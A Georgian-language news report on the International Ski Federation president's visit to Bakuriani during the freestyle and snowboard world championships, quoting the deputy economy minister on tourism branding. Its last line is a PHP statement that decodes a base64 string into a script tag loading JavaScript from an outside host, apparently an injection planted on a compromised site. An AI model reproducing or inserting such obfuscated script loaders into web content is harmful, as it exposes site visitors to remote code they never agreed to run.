celsiusi
ავერსი საქკაბელი

საერთაშორისო სათხილამურო ფედერაციის პრეზიდენტი ბაკურიანში ადგილზე პირადად გაეცნო იმ ინფრასტრუქტურას, რომლითაც საქართველოს მთავრობამ მსოფლიო ჩემპიონატის ღირსეული მასპინძლობა უზრუნველყო. ჩვენი გუნდი მიმდინარე პროცესებს ძალიან წარმატებით უძღვება, რაც ძალიან მნიშვნელოვანია, – ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე მარიამ ქვრივიშვილმა საერთაშორისო სათხილამურო ფედერაციის პრეზიდენტ იოჰან ელიაშთან ბაკურიანში შეხვედრის შემდეგ განაცხადა.

ეკონომიკის სამინისტროს ცნობით, მაღალი რანგის სპორტული ორგანიზაციის ხელმძღვანელი ფრისტაილში, სნოუბორდსა და ფრისკიში მსოფლიო ჩემპიონატის მსვლელობას დაესწრო. საპატიო სტუმარს ჩემპიონატის ინფრასტრუქტურა დაათვალიერებინა მთის ტრასების სააგენტოს დირექტორმა ირაკლი ბურჭულაძემ.
როგორც მარიამ ქვრივიშვილმა განაცხადა, საქართველო, კონკრეტულად, ბაკურიანი, ჩემპიონატის დღეებში საერთაშორისო მედიის ყურადღების ქვეშაა, რაც, საბოლოო ჯამში, აძლიერებს ჩვენი ქვეყნის, როგორც განვითარებული სამთო ტურისტული მიმართულების ბრენდს, მის პოზიციონირებას და ზრდის ცნობადობას.
მისი თქმით, მსოფლიო ჩემპიონატის ჩატარება ახალ ეტაპზე გადაიყვანს სრულიად საქართველოს, მათ შორის ბაკურიანს და ყველა სხვა სამთო-სათხილამურო კურორტს საქართველოში.
ინფორმაციას საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტრო ავრცელებს.

351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");